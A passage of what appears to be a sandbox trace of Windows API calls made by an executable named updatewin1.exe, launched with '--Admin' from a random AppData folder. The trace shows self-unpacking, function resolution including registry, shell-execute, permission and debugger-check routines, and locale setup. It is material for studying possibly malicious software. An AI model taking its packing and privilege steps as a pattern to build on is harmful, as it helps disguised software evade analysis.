lpProcName="GetVersionExA") returned 0x76d43519 [0114.262] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0114.262] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0114.262] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0114.262] SetErrorMode (uMode=0x400) returned 0x0 [0114.262] SetErrorMode (uMode=0x0) returned 0x400 [0114.262] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0114.262] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0114.266] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0114.298] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.299] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0114.299] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0114.299] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0114.299] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0114.299] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0114.299] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0114.300] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0114.301] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0114.302] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0114.303] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0114.304] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0114.305] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0114.305] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0114.305] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0114.305] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0114.305] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0114.305] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0114.305] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0114.305] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0114.305] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0114.305] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0114.305] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0114.305] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0114.305] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0114.306] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0114.306] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0114.306] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0114.306] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0114.306] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0114.306] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0114.306] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0114.306] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0114.311] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0114.311] atexit (param_1=0x5f63e0) returned 0 [0114.312] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x201a05c0, dwHighDateTime=0x1d5fd35)) [0114.312] GetCurrentThreadId () returned 0xa6c [0114.312] GetCurrentProcessId () returned 0xa70 [0114.312] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=23454707244) returned 1 [0114.325] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0114.327] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0114.327] GetLastError () returned 0x57 [0114.328] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0114.328] GetLastError () returned 0x57 [0114.328] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0114.328] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0114.328] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0114.328] GetLastError () returned 0x57 [0114.328] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0114.329] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0114.331] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0114.331] GetLastError () returned 0x57 [0114.331] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0114.332] GetLastError () returned 0x57 [0114.332] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0114.332] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0114.332] GetProcessHeap () returned 0x5e0000 [0114.332] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0114.332] GetLastError () returned 0x57 [0114.332] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0114.333] GetLastError () returned 0x57 [0114.333] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0114.333] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x364) returned 0x60a9f0 [0114.333] SetLastError (dwErrCode=0x57) [0114.334] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xc00) returned 0x60ad60 [0114.336] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x579433ec, hStdError=0xfffffffe)) [0114.336] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0114.336] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0114.336] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.337] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" --Admin" [0114.337] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" --Admin" [0114.337] IsValidCodePage (CodePage=0x4e4) returned 1 [0114.337] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0114.337] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0114.337] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0114.337] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0114.337] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0114.338] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0114.338] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0114.338] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0114.338] GetLastError () returned 0x57 [0114.339] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0114.339] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0114.339] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0114.339] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4\x96ÍWHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0114.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0114.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0114.386] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0114.386] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0114.386] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 